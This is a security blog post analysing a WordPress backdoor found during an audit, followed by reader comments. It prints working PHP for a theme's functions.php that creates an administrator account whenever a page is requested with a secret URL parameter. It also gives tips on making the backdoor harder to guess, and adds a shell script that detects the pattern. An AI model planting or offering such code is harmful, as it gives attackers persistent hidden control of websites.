WordPress Backdoor to Create Administrator Account

Last updated on December 06th, 2014 by Robert Abela. Filed under WordPress Security Hacks

While doing a WordPress security audit and WordPress security lock down for one of our customers, I noticed he had a WordPress password backdoor installed on his WordPress installation. The WordPress backdoor is a very simple, yet powerful PHP script which can be triggered by requesting a specific URL from a normal web browser, such as Google Chrome or Firefox.

Once the WordPress backdoor is triggered, a new WordPress user with the Administrator role is automatically created on the customer's WordPress website, which a malicious user can use to regain access to the WordPress installation at any time, even after the original intrusion has been cleaned up. In this post we will look at the backdoor's code and explain how it works.

Note: This post is for educational and learning purposes ONLY. We DO NOT recommend that anyone use such a backdoor in his or her WordPress installation.

WordPress Backdoor

The WordPress backdoor is shown below. It is a simple PHP function added to the active theme's functions.php file, which WordPress loads on every request, so the code runs without any plugin being installed or activated.

<?php
// Hook the function on wp_head, which fires on every front-end page load,
// so the check below runs whenever any public page of the site is requested.
add_action('wp_head', 'WordPress_backdoor');

function WordPress_backdoor() {
    // Trigger: any front-end URL with ?backdoor=go appended.
    if (isset($_GET['backdoor']) && $_GET['backdoor'] == 'go') {
        // Deprecated since WordPress 3.1: the user functions used here live in
        // wp-includes/user.php, which WordPress already loads, so this line is
        // unnecessary but harmless.
        require('wp-includes/registration.php');
        // Create the account only once, so repeated triggers leave no error.
        if (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
?>

The backdoor is triggered by appending ?backdoor=go to a front-end URL of the site, for example http://www.wpwhitesecurity.com?backdoor=go if it were installed on www.wpwhitesecurity.com (this is a NON working example). Because the function is hooked on wp_head, which runs on every public page, the trigger works on any page of the site, not only the home page, and no login is required.

How Does the WordPress Password Backdoor Work?

Using the above example, once the WordPress backdoor is triggered a new WordPress administrator account is created with the following credentials:

User:  backdooradmin
Password: Pa55W0rd

Using the WordPress Backdoor

If you would like to use the above WordPress backdoor for whatever reason you might have, change the trigger to something that cannot be guessed (the name and value of the GET parameter, backdoor and go in the example above) and use a strong username and password instead of backdooradmin and Pa55W0rd.

WP White Security Tip: We DO NOT recommend using such a WordPress backdoor. The information in this post should only be used for educational and learning purposes.

Please note that by posting information about this WordPress backdoor online, we are not exposing anything malicious. To plant such a backdoor, an attacker would already need write access to your theme files, for example via FTP. If someone manages to gain FTP access to your WordPress website, there are many other things you should worry about besides this WordPress backdoor.
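As an added example that is not part of the original post, the following POSIX shell script does the check a site owner would want after reading the above: it scans a wp-content directory for PHP files that combine the two ingredients of this backdoor, reading a request parameter and creating a user or changing a role. The wp-content layout and the three sample files are constructed for the demonstration, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the original post): find PHP files under a wp-content
# tree that both read request parameters and create users or change roles.

# Print, sorted, every .php file under $1 that matches both patterns.
scan_wp_backdoor_patterns() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if grep -qE 'wp_create_user|wp_insert_user|set_role\(|add_role\(' "$f" &&
           grep -qE '\$_(GET|POST|REQUEST|COOKIE)' "$f"; then
            printf '%s\n' "$f"
        fi
    done | sort
}

# Build a constructed wp-content tree in $1: one planted backdoor, two benign files.
make_sample_tree() {
    base="$1"
    mkdir -p "$base/themes/sample-theme" "$base/plugins/cli-tool" "$base/plugins/search-widget"

    # Planted: same shape as the backdoor in the post (request parameter,
    # user creation and role change in one file).
    cat > "$base/themes/sample-theme/functions.php" <<'EOF'
<?php
add_action('wp_head', 'theme_extra');
function theme_extra() {
    if (isset($_GET['backdoor']) && $_GET['backdoor'] == 'go') {
        if (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}
EOF

    # Benign: creates users from a command-line importer, never from a web request.
    cat > "$base/plugins/cli-tool/cli.php" <<'EOF'
<?php
function import_user($login, $pass) {
    return wp_create_user($login, $pass);
}
EOF

    # Benign: reads a request parameter but never touches users or roles.
    cat > "$base/plugins/search-widget/widget.php" <<'EOF'
<?php
$term = isset($_GET['s']) ? sanitize_text_field($_GET['s']) : '';
EOF
}

# Build the constructed tree in a temporary directory, scan it and print the
# flagged paths relative to the tree root. Expected: only the theme's functions.php.
demo() {
    tmp=$(mktemp -d)
    make_sample_tree "$tmp"
    scan_wp_backdoor_patterns "$tmp" | sed "s|^$tmp/||"
    rm -rf "$tmp"
}

# Running this file directly prints the flagged file(s) for the constructed tree.
demo
```

A match is a starting point, not proof: a legitimate registration plugin also reads $_POST and calls wp_create_user, so read each flagged file before removing it. Pair the scan with a look at the Users screen for administrator accounts you did not create, since the account survives even after the planted code is deleted.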

If you would like to make a WordPress Security Audit, pimp up the security of your WordPress installation or need any type of WordPress professional support, drop us an email on help@wpwhitesecurity.com.


4 comments

Tico 14/12/2012

Hi, the script works as you explain but I keep getting this error "You do not have sufficient permissions to access this page." Even after I log out and then use the normal admin access, I can see the new account made along with the user role being admin, but I still get the error. I am using 3.4.2. Please help.

John Bonello 14/12/2012

Hi Tico,

Thank you for following our blog. We are willing to help you solve your issue, but due to the sensitivity of the issue (i.e. a WordPress backdoor implementation) please contact us directly via our contact form, since we need to verify that you are the owner of the website you are working on.

Joni 24/09/2018

Guys, I need to erase an entire post along with its corresponding photos in my blog. But whenever I sign in and look at my dashboard, the post isn't there. Impossible to delete something that doesn't exist, right? But when I web search or view the blog site, the post and photos are there. What's happening here? No, I did not use that reality stone on my blog.

Here’s my WordPress blog — jonianzures.wordpress.com and I want to completely remove the post “Janet and Niña at SM City – Marilao” and its pictures. Many thanks, amigos!

You can delete it from there or just tell me how to do it.

Robert Abela 03/10/2018

Thanks for reaching out Joni. We do not provide such services, but may I recommend that you read how to clean a hacked WordPress website?

Note that the article is introductory and if you do not have experience with these things, you’d be better off paying someone professional to check the website for you.
